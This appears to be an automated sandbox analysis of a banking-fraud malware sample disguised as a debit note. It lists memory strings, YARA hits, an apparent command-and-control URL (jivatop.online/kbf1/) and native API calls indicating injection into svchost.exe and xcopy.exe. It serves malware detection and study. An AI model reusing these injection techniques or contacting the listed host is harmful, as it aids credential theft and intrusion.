20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 2

Source: xcopy.exe, 00000006.00000002.4098892628.0000000004298000.00000004.10000000.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.0000000003908000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
Source: xcopy.exe, 00000006.00000002.4098892628.0000000004C04000.00000004.10000000.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.0000000004274000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.gmo.jp/images/public/common/logo.gif
Source: PMZSowQBcVJqD.exe, 00000007.00000002.4099556675.0000000005694000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.jivatop.online
Source: PMZSowQBcVJqD.exe, 00000007.00000002.4099556675.0000000005694000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.jivatop.online/kbf1/
Source: xcopy.exe, 00000006.00000002.4098892628.0000000004C04000.00000004.10000000.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.0000000004274000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.onamae-server.com/
Source: xcopy.exe, 00000006.00000002.4098892628.0000000004C04000.00000004.10000000.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.0000000004274000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.onamae.com/?banner_id=634
Source: xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: xcopy.exe, 00000006.00000002.4095507452.000000000300A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: xcopy.exe, 00000006.00000002.4095507452.000000000300A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: xcopy.exe, 00000006.00000002.4095507452.000000000300A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: xcopy.exe, 00000006.00000002.4095507452.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: xcopy.exe, 00000006.00000002.4095507452.000000000300A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: xcopy.exe, 00000006.00000002.4095507452.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: xcopy.exe, 00000006.00000003.2243798989.0000000007F6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: xcopy.exe, 00000006.00000002.4098892628.0000000004F28000.00000004.10000000.00040000.00000000.sdmp, xcopy.exe, 00000006.00000002.4098892628.0000000004106000.00000004.10000000.00040000.00000000.sdmp, xcopy.exe, 00000006.00000002.4100845977.0000000006540000.00000004.00000800.00020000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.0000000003776000.00000004.00000001.00040000.00000000.sdmp, PMZSowQBcVJqD.exe, 00000007.00000002.4097443075.0000000004598000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: xcopy.exe, 00000006.00000003.2254927706.0000000007F8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud

Binary is likely a compiled AutoIt script file

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4097004785.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4095195033.0000000000A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4099556675.0000000005630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2058640139.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4097236613.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4096792766.0000000003740000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2059058691.0000000004D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe, 00000000.00000000.1629129401.00000000008C2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_8d7a8c05-c
Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe, 00000000.00000000.1629129401.00000000008C2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_3bce7540-0
Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_ea0a6475-2
Source: debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_67e97044-1

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042C393 NtClose,	1_2_0042C393
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036735C0 NtCreateMutant,LdrInitializeThunk,	1_2_036735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672B60 NtClose,LdrInitializeThunk,	1_2_03672B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,	1_2_03672DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03674340 NtSetContextThread,	1_2_03674340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03673010 NtOpenDirectoryObject,	1_2_03673010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03673090 NtSetValueKey,	1_2_03673090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03674650 NtSuspendThread,	1_2_03674650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672BE0 NtQueryValueKey,	1_2_03672BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672BF0 NtAllocateVirtualMemory,	1_2_03672BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672BA0 NtEnumerateValueKey,	1_2_03672BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672B80 NtQueryInformationFile,	1_2_03672B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672AF0 NtWriteFile,	1_2_03672AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672AD0 NtReadFile,	1_2_03672AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672AB0 NtWaitForSingleObject,	1_2_03672AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036739B0 NtGetContextThread,	1_2_036739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672F60 NtCreateProcessEx,	1_2_03672F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672F30 NtCreateSection,	1_2_03672F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672FE0 NtCreateFile,	1_2_03672FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672FA0 NtQuerySection,	1_2_03672FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672FB0 NtResumeThread,	1_2_03672FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672F90 NtProtectVirtualMemory,	1_2_03672F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672E30 NtWriteVirtualMemory,	1_2_03672E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672EE0 NtQueueApcThread,	1_2_03672EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672EA0 NtAdjustPrivilegesToken,	1_2_03672EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672E80 NtReadVirtualMemory,	1_2_03672E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03673D70 NtOpenThread,	1_2_03673D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672D30 NtUnmapViewOfSection,	1_2_03672D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672D00 NtSetInformationFile,	1_2_03672D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672D10 NtMapViewOfSection,	1_2_03672D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03673D10 NtOpenProcessToken,	1_2_03673D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672DD0 NtDelayExecution,	1_2_03672DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672DB0 NtEnumerateKey,	1_2_03672DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672C60 NtCreateKey,	1_2_03672C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672C70 NtFreeVirtualMemory,	1_2_03672C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672C00 NtQueryInformationProcess,	1_2_03672C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672CF0 NtOpenProcess,	1_2_03672CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672CC0 NtQueryVirtualMemory,	1_2_03672CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672CA0 NtQueryInformationToken,	1_2_03672CA0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D4340 NtSetContextThread,LdrInitializeThunk,	6_2_035D4340
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D4650 NtSuspendThread,LdrInitializeThunk,	6_2_035D4650
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D35C0 NtCreateMutant,LdrInitializeThunk,	6_2_035D35C0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2B60 NtClose,LdrInitializeThunk,	6_2_035D2B60
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_035D2BF0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2BE0 NtQueryValueKey,LdrInitializeThunk,	6_2_035D2BE0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2BA0 NtEnumerateValueKey,LdrInitializeThunk,	6_2_035D2BA0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2AD0 NtReadFile,LdrInitializeThunk,	6_2_035D2AD0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2AF0 NtWriteFile,LdrInitializeThunk,	6_2_035D2AF0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D39B0 NtGetContextThread,LdrInitializeThunk,	6_2_035D39B0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2F30 NtCreateSection,LdrInitializeThunk,	6_2_035D2F30
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2FE0 NtCreateFile,LdrInitializeThunk,	6_2_035D2FE0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2FB0 NtResumeThread,LdrInitializeThunk,	6_2_035D2FB0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2EE0 NtQueueApcThread,LdrInitializeThunk,	6_2_035D2EE0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2E80 NtReadVirtualMemory,LdrInitializeThunk,	6_2_035D2E80
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2D10 NtMapViewOfSection,LdrInitializeThunk,	6_2_035D2D10
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2D30 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_035D2D30
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2DD0 NtDelayExecution,LdrInitializeThunk,	6_2_035D2DD0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_035D2DF0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_035D2C70
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2C60 NtCreateKey,LdrInitializeThunk,	6_2_035D2C60
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2CA0 NtQueryInformationToken,LdrInitializeThunk,	6_2_035D2CA0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D3010 NtOpenDirectoryObject,	6_2_035D3010
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D3090 NtSetValueKey,	6_2_035D3090
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2B80 NtQueryInformationFile,	6_2_035D2B80
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2AB0 NtWaitForSingleObject,	6_2_035D2AB0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2F60 NtCreateProcessEx,	6_2_035D2F60
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2F90 NtProtectVirtualMemory,	6_2_035D2F90
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2FA0 NtQuerySection,	6_2_035D2FA0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2E30 NtWriteVirtualMemory,	6_2_035D2E30
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2EA0 NtAdjustPrivilegesToken,	6_2_035D2EA0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D3D70 NtOpenThread,	6_2_035D3D70
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D3D10 NtOpenProcessToken,	6_2_035D3D10
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2D00 NtSetInformationFile,	6_2_035D2D00
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2DB0 NtEnumerateKey,	6_2_035D2DB0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2C00 NtQueryInformationProcess,	6_2_035D2C00
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2CC0 NtQueryVirtualMemory,	6_2_035D2CC0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_035D2CF0 NtOpenProcess,	6_2_035D2CF0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_00A49070 NtClose,	6_2_00A49070
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_00A491D0 NtAllocateVirtualMemory,	6_2_00A491D0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_00A48D70 NtCreateFile,	6_2_00A48D70
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_00A48EE0 NtReadFile,	6_2_00A48EE0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 6_2_00A48FD0 NtDeleteFile,	6_2_00A48FD0

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004184B3	1_2_004184B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00410063	1_2_00410063
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E0E3	1_2_0040E0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00403080	1_2_00403080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042E9A3	1_2_0042E9A3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004011B0	1_2_004011B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E22D	1_2_0040E22D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402C6D	1_2_00402C6D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402C70	1_2_00402C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402470	1_2_00402470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040FE43	1_2_0040FE43
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004166F3	1_2_004166F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362D34C	1_2_0362D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FA352	1_2_036FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F132D	1_2_036F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364E3F0	1_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037003E6	1_2_037003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0368739A	1_2_0368739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E12ED	1_2_036E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365D2F0	1_2_0365D2F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365B2C0	1_2_0365B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036452A0	1_2_036452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0367516C	1_2_0367516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362F172	1_2_0362F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0370B16B	1_2_0370B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C8158	1_2_036C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03630100	1_2_03630100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DA118	1_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F81CC	1_2_036F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364B1B0	1_2_0364B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037001AA	1_2_037001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F70E9	1_2_036F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FF0E0	1_2_036FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EF0CC	1_2_036EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036470C0	1_2_036470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03664750	1_2_03664750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363C7C0	1_2_0363C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FF7B0	1_2_036FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365C6E0	1_2_0365C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F16CC	1_2_036F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F7571	1_2_036F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640535	1_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DD5B0	1_2_036DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03700591	1_2_03700591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03631460	1_2_03631460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F2446	1_2_036F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FF43F	1_2_036FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EE4F6	1_2_036EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FFB76	1_2_036FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FAB40	1_2_036FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B5BF0	1_2_036B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0367DBF9	1_2_0367DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F6BD7	1_2_036F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365FB80	1_2_0365FB80
